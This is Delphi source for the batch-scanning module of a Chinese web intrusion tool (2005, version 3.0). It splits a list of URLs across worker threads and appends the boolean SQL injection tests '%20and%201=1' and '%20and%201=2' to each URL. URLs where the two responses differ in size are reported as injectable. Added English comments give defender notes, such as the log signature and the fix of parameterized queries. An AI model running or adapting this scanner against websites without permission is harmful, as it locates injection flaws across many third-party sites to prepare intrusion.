{##########################################
旁注入侵专用程序 3.0升级版
-----------------------------------------
模块:网页扫描 - 批量扫描注入点
描述:该单元为批量扫描注入点的线程单元
作者:2005.3.17日下午 明小子
##########################################}
unit Scaninject;
interface
uses
Classes, StdCtrls, Wininet, GetHttpSize, Windows, SysUtils, ComCtrls, Dialogs,
RzlstBox, Shellapi;
type
{ Worker thread that probes one slice of a URL list for SQL injection.
  Each URL is requested twice by Execute with a boolean test suffix appended
  and the two response sizes are compared; URLs that differ are reported in a
  list view. Several instances are meant to run in parallel, each covering its
  own slice of the list. }
Thject = class(TThread)
private
// Slice number of this thread. Execute computes the slice as
// (Num*AVG - AVG) .. (Num*AVG - 1), so it appears to be 1-based - confirm at the caller.
Num: integer;
// Total number of worker threads; used as the divisor when sizing the slices.
ThreadCount: integer;
// Index of the list item currently being processed. Written by Execute and
// read by UpdataMemo / UpdataScan when they run through Synchronize.
ifor: integer;
// List box holding the URLs to probe (owned by the caller, not by the thread).
TempLsb: TRzListBox;
// List view that receives the URLs flagged by the probe.
ResultLstv: TListView;
// Adds the current URL to ResultLstv and refreshes the column header.
procedure UpdataMemo;
// Logs the current URL as processed and resets the main form when all are done.
procedure UpdataScan;
protected
// Thread body: probes every URL in this thread's slice.
procedure Execute; override;
public
// ReadLsb: source URLs; SaveLisv: result view; T_Num: slice number;
// ThCount: number of threads. The thread starts immediately and frees itself.
constructor Create(ReadLsb: TRzListBox; SaveLisv: TListView; T_Num, ThCount: integer);
end;
implementation
uses MainUnit;
{ Records the shared UI controls and the slice parameters, then starts the
  thread right away.
    ReadLsb  - list box holding the URLs to probe
    SaveLisv - list view that receives the flagged URLs
    T_Num    - slice number handled by this thread
    ThCount  - total number of worker threads
  NOTE(review): ThCount is stored unchecked and Execute divides by it, so a
  value of 0 raises a division error inside the thread. }
constructor Thject.Create(ReadLsb: TRzListBox; SaveLisv: TListView; T_Num, ThCount: integer);
begin
  // Controls owned by the main form; the thread only keeps references.
  ResultLstv := SaveLisv;
  TempLsb := ReadLsb;

  // Work-sharing parameters read later by Execute.
  ThreadCount := ThCount;
  Num := T_Num;

  // The thread object releases itself once Execute returns.
  FreeOnTerminate := True;

  // False = not suspended: the thread is started by the inherited constructor.
  inherited Create(False);
end;
{ Appends the URL at index ifor to the result list view and rewrites the first
  column header with the running total. Execute calls this through
  Synchronize, so it runs on the main thread. }
procedure Thject.UpdataMemo;
var
  Row: TListItem;
  Hits: Integer;
begin
  Row := ResultLstv.Items.Add;
  Row.Caption := Trim(TempLsb.Items[ifor]);

  // Count is read after the row was added, so it already includes this hit.
  Hits := ResultLstv.Items.Count;
  Row.SubItems.Add('可注入 - ' + IntToStr(Hits));

  ResultLstv.Columns[0].Caption := '注入点: 共检测到' + IntToStr(Hits) + '个可注入地址!';
end;
{ Records the URL at index ifor as processed and, once the number of processed
  URLs reaches the number of queued URLs, puts the main form back into its
  idle state and tells the user the run is over. Execute calls this through
  Synchronize, so it runs on the main thread. }
procedure Thject.UpdataScan;
var
  Done: Integer;
begin
  MainForm.ScanMemo.Lines.Add(TempLsb.Items[ifor]);
  Done := MainForm.ScanMemo.Lines.Count;
  MainForm.RzGroupBox17.Caption := '已检测连接:' + IntToStr(Done) + '条';

  // Still URLs outstanding: nothing more to do for this call.
  if Done < MainForm.LinkLsb.Items.Count then
    Exit;

  // Every queued URL has been processed: restore buttons, captions and gauge.
  MainForm.btnReadinject.Enabled := True;
  MainForm.sql_Suspend.Enabled := False;
  MainForm.sql_Stop.Enabled := False;
  MainForm.sql_Suspend.Caption := '暂停检测';
  MainForm.Gauge1.Progress := 0;
  MainForm.RzGroupBox6.Caption := '检测:';
  MainForm.Pane1.Caption := '检测完毕!';
  MainForm.Timer1.Enabled := False;
  FlashWindow(MainForm.Handle, True);

  // The message depends on whether the result view holds any entry.
  if MainForm.sqlListView.Items.Count = 0 then
    ShowMessage('所有连接地址已检测完毕,没有发现任何注入点!')
  else
    ShowMessage('所有连接地址已检测完毕!');
end;
{ Thread body. Splits the URL list into ThreadCount slices of equal size
  (rounded up) and probes the slice selected by Num.

  For every URL two requests are made through Get_HttpSize, one with
  '%20and%201=1' appended and one with '%20and%201=2'. The URL is reported
  when the first response is larger than the second.

  Defender notes:
  - In web-server logs this shows up as two requests for the same URL in quick
    succession whose query strings end in '%20and%201=1' and then
    '%20and%201=2', repeated across many URLs of a site. That pairing is a
    usable detection signature.
  - A page only reacts to the suffix when request parameters are concatenated
    into a SQL statement; parameterized queries remove the condition being
    tested here.
  - The result is a response-size heuristic, so a reported URL is an
    indication to investigate, not proof of a flaw.

  NOTE(review): TempLsb is a visual control and is read here from the worker
  thread; only the two Updata* calls go through Synchronize. }
procedure Thject.Execute;
var
  Total, ChunkSize: Integer;
  FirstIdx, LastIdx, Idx: Integer;
  SizeTrue, SizeFalse: Integer;
begin
  Total := TempLsb.Items.Count;

  // Slice size = ceil(Total / ThreadCount).
  ChunkSize := Total div ThreadCount;
  if (Total mod ThreadCount) > 0 then
    Inc(ChunkSize);

  FirstIdx := (Num - 1) * ChunkSize;
  LastIdx := Num * ChunkSize - 1;

  for Idx := FirstIdx to LastIdx do
  begin
    // Stop on request, or when the rounded-up slice runs past the list end.
    if Terminated or (Idx >= Total) then
      Exit;

    try
      // Published for UpdataScan / UpdataMemo, which read ifor.
      ifor := Idx;

      // Second argument is presumably a timeout in milliseconds - confirm in GetHttpSize.
      SizeTrue := Get_HttpSize(TempLsb.Items[Idx] + '%20and%201=1', 40000);
      SizeFalse := Get_HttpSize(TempLsb.Items[Idx] + '%20and%201=2', 40000);

      if Terminated then
        Exit;

      Synchronize(UpdataScan);
      if SizeTrue > SizeFalse then
        Synchronize(UpdataMemo);
    except
      // Any exception for this URL is discarded; the URL is then not counted as processed.
    end;

    Sleep(50);
  end;
end;
end.